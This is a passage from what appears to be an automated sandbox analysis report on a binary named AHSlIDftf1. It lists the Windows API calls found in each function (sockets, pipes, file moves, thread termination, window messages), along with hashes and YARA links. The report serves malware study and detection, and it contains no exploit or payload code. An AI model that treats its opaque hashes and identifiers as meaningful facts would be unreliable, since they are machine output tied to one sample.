                                                                                                            • Instruction Fuzzy Hash: 7E51A071A00649AFDB11DFA8E885AEEBBF9EF09300F14415AE955E7291E730DA41CB70
                                                                                                            Function 00D72D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00D72D4B
                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00D72D53
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00D72DE1
                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00D72E0C
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00D72E61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                            • Opcode ID: e80ef6aaa65c1a479088365279a1472940456140e0e7c76e13dde99fd6c03df8
                                                                                                            • Instruction ID: d2d8aeb2a909eaab94e247c335449b9c36de3ac7947b1bd01d54523bf81b442b
                                                                                                            • Opcode Fuzzy Hash: e80ef6aaa65c1a479088365279a1472940456140e0e7c76e13dde99fd6c03df8
                                                                                                            • Instruction Fuzzy Hash: 7B417234E002499BCF10DF68C855AAEBBA5EF44324F18C155E818AB352E731EA45CBF1
                                                                                                            Function 00DD10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DD304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DD307A
                                                                                                              • Part of subcall function 00DD304E: _wcslen.LIBCMT ref: 00DD309B
                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00DD1112
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1121
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD11C9
                                                                                                            • closesocket.WSOCK32(00000000), ref: 00DD11F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 2675159561-0
                                                                                                            • Opcode ID: c3feab846b0fa5dd7f3ec1180fe5d245e1ff7a12d3741dce501d36c5746369cb
                                                                                                            • Instruction ID: 76f0152226d44c9bc7bbf329c0aa83965366247856db73a6e7ecc8665b5cb0de
                                                                                                            • Opcode Fuzzy Hash: c3feab846b0fa5dd7f3ec1180fe5d245e1ff7a12d3741dce501d36c5746369cb
                                                                                                            • Instruction Fuzzy Hash: 5A41C035600314AFDB10AF64CC84BAABBA9EF45324F18805AFD559B391C770ED45CBB1
                                                                                                            Function 00DBCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DBCF22,?), ref: 00DBDDFD
                                                                                                              • Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DBCF22,?), ref: 00DBDE16
                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00DBCF45
                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00DBCF7F
                                                                                                            • _wcslen.LIBCMT ref: 00DBD005
                                                                                                            • _wcslen.LIBCMT ref: 00DBD01B
                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00DBD061
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 3164238972-1173974218
                                                                                                            • Opcode ID: 1d9e8d3bb0a41c226d2fdc51397482f6ffe9eb74d2f0df1fef71e6194c2ce74c
                                                                                                            • Instruction ID: 9643b0e8681d861207a2c1639846e3245b9261d400b00d8aa75cfc499d6664e0
                                                                                                            • Opcode Fuzzy Hash: 1d9e8d3bb0a41c226d2fdc51397482f6ffe9eb74d2f0df1fef71e6194c2ce74c
                                                                                                            • Instruction Fuzzy Hash: 27416971946218DFDF12EFA4C981AEDB7B9EF48380F1400E6E54AEB141EB34A645CB70
                                                                                                            Function 00DE2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DE2E1C
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00DE2E4F
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00DE2E84
                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00DE2EB6
                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00DE2EE0
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00DE2EF1
                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DE2F0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 2178440468-0
                                                                                                            • Opcode ID: 2cf93350ae00847b62b9907507c001ce672745e65fa5a24a2e99ae31941e51ab
                                                                                                            • Instruction ID: a8b386ffd5cf873e77fa708d3c0d90e1582e2896bd57cfb5359228b2d42e4f12
                                                                                                            • Opcode Fuzzy Hash: 2cf93350ae00847b62b9907507c001ce672745e65fa5a24a2e99ae31941e51ab
                                                                                                            • Instruction Fuzzy Hash: 9C3116306042A09FDB21AF1ADC85F6637E8EB9AB10F1801A4F904DF2B1CB71AC459B61
                                                                                                            Function 00DB7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB7769
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB778F
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00DB7792
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00DB77B0
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00DB77B9
                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00DB77DE
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00DB77EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761583154-0
                                                                                                            • Opcode ID: feecaaec8af588342a408675ff37466f0edd37145cf5e63d11514fe11aa468f1
                                                                                                            • Instruction ID: a78359824be05b500d54787669f2b0570fff67b4350cd2dc62b22b637e310054
                                                                                                            • Opcode Fuzzy Hash: feecaaec8af588342a408675ff37466f0edd37145cf5e63d11514fe11aa468f1
                                                                                                            • Instruction Fuzzy Hash: C421B276604219AFDB10EFA8DC88CFB77ACEB49764B548025F915DF291DA70EC4287B0
                                                                                                            Function 00DB77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB7842
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB7868
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00DB786B
                                                                                                            • SysAllocString.OLEAUT32 ref: 00DB788C
                                                                                                            • SysFreeString.OLEAUT32 ref: 00DB7895
                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00DB78AF
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00DB78BD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761583154-0
                                                                                                            • Opcode ID: f8c4dd0bf7a6236e97d8da77a0111b058a48b38e8f69b3d9702f3b005966e1e2
                                                                                                            • Instruction ID: 25d83ac7b6cfd4d29fd741e9177dca20fdd3cb845d1e931a7e1ff043c2d7c12f
                                                                                                            • Opcode Fuzzy Hash: f8c4dd0bf7a6236e97d8da77a0111b058a48b38e8f69b3d9702f3b005966e1e2
                                                                                                            • Instruction Fuzzy Hash: BE215036608204EFDB10AFB8DC8CDAA77ECEB497607548125F916CB2A1DA74EC41DB74
                                                                                                            Function 00DC04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00DC04F2
                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DC052E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHandlePipe
                                                                                                            • String ID: nul
                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                            • Opcode ID: a1d61b5e97f02c9811209d4cad8984b8e4ca6e5a92cd9cad84885aede6c30fe1
                                                                                                            • Instruction ID: a1a53fc98210e13e962cf9992d75facb777e6198d145ad903e8a73c1857af24e
                                                                                                            • Opcode Fuzzy Hash: a1d61b5e97f02c9811209d4cad8984b8e4ca6e5a92cd9cad84885aede6c30fe1
                                                                                                            • Instruction Fuzzy Hash: 5F211775610306EBDF209F69D844F9A7BB8AF44724F244A1DE9A1E72E0E7709942CF30
                                                                                                            Function 00DC05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00DC05C6
                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DC0601
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHandlePipe
                                                                                                            • String ID: nul
                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                            • Opcode ID: b6689bea471bc6207fd23f8abd06feda994de8edfd127c86200e3c14d3ffd11b
                                                                                                            • Instruction ID: be112b2049eff062652f5ec11a3aea92190e8da1d8f519471c4203a2fe51b517
                                                                                                            • Opcode Fuzzy Hash: b6689bea471bc6207fd23f8abd06feda994de8edfd127c86200e3c14d3ffd11b
                                                                                                            • Instruction Fuzzy Hash: 12218E75540316DBDB209F698C44F9A7BE8AF95B20F240A1DF9A1E72E0D7B09861CB30
                                                                                                            Function 00DE40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D5600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D5604C
                                                                                                              • Part of subcall function 00D5600E: GetStockObject.GDI32(00000011), ref: 00D56060
                                                                                                              • Part of subcall function 00D5600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5606A
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DE4112
                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DE411F
                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DE412A
                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DE4139
                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DE4145
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                            • String ID: Msctls_Progress32
                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                            • Opcode ID: 84adedc05ce015779ad8893962de963190292fa3464f79b8ac8f332f396243d0
                                                                                                            • Instruction ID: ba8cd18ef22bf821f8a0a5132dfe8820f74087bd2a621b47030a6404c35e16d3
                                                                                                            • Opcode Fuzzy Hash: 84adedc05ce015779ad8893962de963190292fa3464f79b8ac8f332f396243d0
                                                                                                            • Instruction Fuzzy Hash: 7711E2B2140219BEEF109F65CC81EE77FADEF08798F004110BA18E2190C672DC21DBB0
                                                                                                            Function 00D8D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D8D7A3: _free.LIBCMT ref: 00D8D7CC
                                                                                                            • _free.LIBCMT ref: 00D8D82D
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • _free.LIBCMT ref: 00D8D838
                                                                                                            • _free.LIBCMT ref: 00D8D843
                                                                                                            • _free.LIBCMT ref: 00D8D897
                                                                                                            • _free.LIBCMT ref: 00D8D8A2
                                                                                                            • _free.LIBCMT ref: 00D8D8AD
                                                                                                            • _free.LIBCMT ref: 00D8D8B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                            • Instruction ID: 683a607a79a554e7f3f99b7cf8e32f641d0644f33c40c797d519e14634b40307
                                                                                                            • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                            • Instruction Fuzzy Hash: D711C671981B04BADA21BFB0CC46FDB7B9EEF05700F404825F29AA65D2DB79A5058B70
                                                                                                            Function 00DBDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DBDA74
                                                                                                            • LoadStringW.USER32(00000000), ref: 00DBDA7B
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DBDA91
                                                                                                            • LoadStringW.USER32(00000000), ref: 00DBDA98
                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DBDADC
                                                                                                            Strings
                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00DBDAB9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                            • Opcode ID: 907d67ade556806b4e1ea2f7aa033bf6e94f21128abf07c3aa4ffa31cd4e1b50
                                                                                                            • Instruction ID: 5e9c4b052f42c0916d0458e2934551e5328fdca8fd87a1d06b3e3fb67ae777a3
                                                                                                            • Opcode Fuzzy Hash: 907d67ade556806b4e1ea2f7aa033bf6e94f21128abf07c3aa4ffa31cd4e1b50
                                                                                                            • Instruction Fuzzy Hash: 3A0181F2910348BFEB10BBA09DC9EEB736CEB08305F401496B756E6141EA749E858F74
                                                                                                            Function 00DC096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InterlockedExchange.KERNEL32(013DE0A8,013DE0A8), ref: 00DC097B
                                                                                                            • EnterCriticalSection.KERNEL32(013DE088,00000000), ref: 00DC098D
                                                                                                            • TerminateThread.KERNEL32(013DE0A0,000001F6), ref: 00DC099B
                                                                                                            • WaitForSingleObject.KERNEL32(013DE0A0,000003E8), ref: 00DC09A9
                                                                                                            • CloseHandle.KERNEL32(013DE0A0), ref: 00DC09B8
                                                                                                            • InterlockedExchange.KERNEL32(013DE0A8,000001F6), ref: 00DC09C8
                                                                                                            • LeaveCriticalSection.KERNEL32(013DE088), ref: 00DC09CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 3495660284-0
                                                                                                            • Opcode ID: f9df1816708dbe169e95656d9ed71d8b0b811d500126de6e6fa0006f42d78ffb
                                                                                                            • Instruction ID: 757e0f0dbd6953e158bb64eac5eb59a6ad6c3997da4e3c117f2fa5cbf18663e0
                                                                                                            • Opcode Fuzzy Hash: f9df1816708dbe169e95656d9ed71d8b0b811d500126de6e6fa0006f42d78ffb
                                                                                                            • Instruction Fuzzy Hash: 45F01D31552742EBD7416B94EEC8BD67A29BF01702F842015F201999A0CB749466CFB4
                                                                                                            Function 00D55D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?,?), ref: 00D55D30
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00D55D71
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00D55D99
                                                                                                            • GetClientRect.USER32(?,?), ref: 00D55ED7
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00D55EF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1296646539-0
                                                                                                            • Opcode ID: a29307ae61e982d5595f9c6d85ee5dc73b9f5e9f19d86c764442b6bc1fc7d789
                                                                                                            • Instruction ID: e83e437a9592c1883fe07582d01cd12e2b15ba033a18c60b4f80d9ea66ed54bd
                                                                                                            • Opcode Fuzzy Hash: a29307ae61e982d5595f9c6d85ee5dc73b9f5e9f19d86c764442b6bc1fc7d789
                                                                                                            • Instruction Fuzzy Hash: D8B16A35A0074ADBDF10CFA8C491AEAB7F1BF48311F14851AECA9D7254DB30EA55DB60
                                                                                                            Function 00D801B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
